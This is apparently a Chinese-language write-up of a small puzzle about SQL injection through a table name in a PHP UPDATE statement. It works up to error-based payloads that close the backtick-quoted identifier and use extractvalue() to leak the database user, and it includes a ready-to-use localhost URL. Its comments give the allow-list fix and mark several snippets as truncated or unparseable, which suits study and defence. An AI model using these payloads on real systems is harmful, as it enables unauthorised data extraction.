p牛在群里面出了一个好玩的题目，正好晚上空虚寂寞冷，就做一下暖暖身子，题目是：

``````
<?php

// The table name is interpolated straight into the statement text. The backticks around
// {$table} quote it as an identifier but do not escape it, so a value that contains a
// backtick terminates the identifier and everything after it is parsed as SQL — the whole
// basis of the payloads below. Identifiers cannot be bound as query parameters; the fix
// is to allow-list $table against a fixed set of table names before building the string.
// Where $table comes from is not shown here; presumably a request parameter (the URL
// later on passes ?table=).
// NOTE(review): this reproduction looks truncated — no SET clause and an unmatched `}`.
\$sql = "UPDATE `{\$table}`
WHERE id=1";
}
``````

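``````
-- Reference example of MySQL's multi-table UPDATE grammar: a derived table may be joined
-- between the target table and SET, and WHERE may hold a correlated subquery. This is the
-- shape the injection payloads below imitate.
-- Aliases are written in one case throughout: MySQL treats table aliases as case-sensitive
-- on Unix-like hosts, so the original's B/b, C/c and D/d mix can fail there with an
-- unknown-table error.
UPDATE student d
LEFT JOIN (
    -- per-student total and 1-decimal average over exams on/after 2015-03-10
    SELECT
        b.studentId,
        SUM(b.score) AS s_sum,
        ROUND(AVG(b.score), 1) AS s_avg
    FROM score b
    WHERE b.examTime >= '2015-03-10'
    GROUP BY b.studentId
) c
    ON c.studentId = d.id
SET d.score_sum = c.s_sum,
    d.score_avg = c.s_avg
WHERE d.id = (
    -- only students that actually have an exam in the window; the DISTINCT derived
    -- table yields at most one row per id, so the scalar comparison is safe
    SELECT e.id
    FROM (
        SELECT DISTINCT a.studentId AS id
        FROM score a
        WHERE a.examTime >= '2015-03-10'
    ) e
    WHERE e.id = d.id
)
AND d.age = 1;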
``````

``````
-- Probe of the grammar the injection needs: a derived table joined between the target
-- table and SET. As written it should not run: the derived table exposes only id, so
-- tt.user is an unknown column, and the unqualified `id` in WHERE is ambiguous between
-- t and tt. The next statement sidesteps both by selecting a single literal aliased as
-- user. (The derived table also re-reads the target table; whether MySQL permits that
-- inside a multi-table UPDATE is not shown here.)
update `table` t left join (select id from `table`) tt on tt.user=t.username set username ='admin' where id=1;
``````

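``````
-- Working shape: the derived table now has exactly one column, user, so tt.user resolves
-- and `id` in WHERE can only mean t.id. LEFT JOIN keeps every row of t, so the update of
-- id=1 proceeds whether or not the join matches anything. The payloads below keep this
-- shape and only replace the derived table's contents.
-- The original rendering used typographic quotes (‘1’), which MySQL does not accept as a
-- string delimiter; plain single quotes restored.
update `table` t left join (select '1' as user from dual) tt on tt.user=t.username set username ='admin' where id=1;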
``````

``````
-- Value submitted as `table` (a fragment, not a statement). Its leading backtick closes
-- the identifier the template opens before {$table}; what follows is then parsed as SQL:
-- a LEFT JOIN to a derived table whose WHERE evaluates extractvalue() on a string built
-- from user(). The 0x7e ('~') prefix makes that XPath invalid, the classic error-based
-- primitive — the queried value is presumably echoed back in the error message.
-- The template's own closing backtick is not accounted for here; see the assembled
-- statement that follows.
table` t left join (select '1' as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username
``````

``````
-- The statement as actually assembled by the template from the value above. Two things
-- break it: the single quotes arrived escaped (\'1\') — looks like addslashes/magic_quotes
-- on the input, TODO confirm — and the template's trailing backtick is left dangling
-- after t.username, opening a quoted identifier that swallows `where id=1` and never
-- closes, so the statement cannot parse.
-- The next payload replaces the literal with char(97) (no quotes needed) and places its
-- own backtick before t.username so the template's closing backtick completes a quoted
-- identifier instead of dangling.
-- NOTE(review): a backtick-quoted `t.username` is a single identifier, not alias.column;
-- whether MySQL still resolves it, or the extractvalue error fires first, is not shown here.
update `table` t left join (select \‘1\’ as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username`
where id=1
``````

``````http://localhost/code.php?table=table` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username
``````

``````update `table` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username`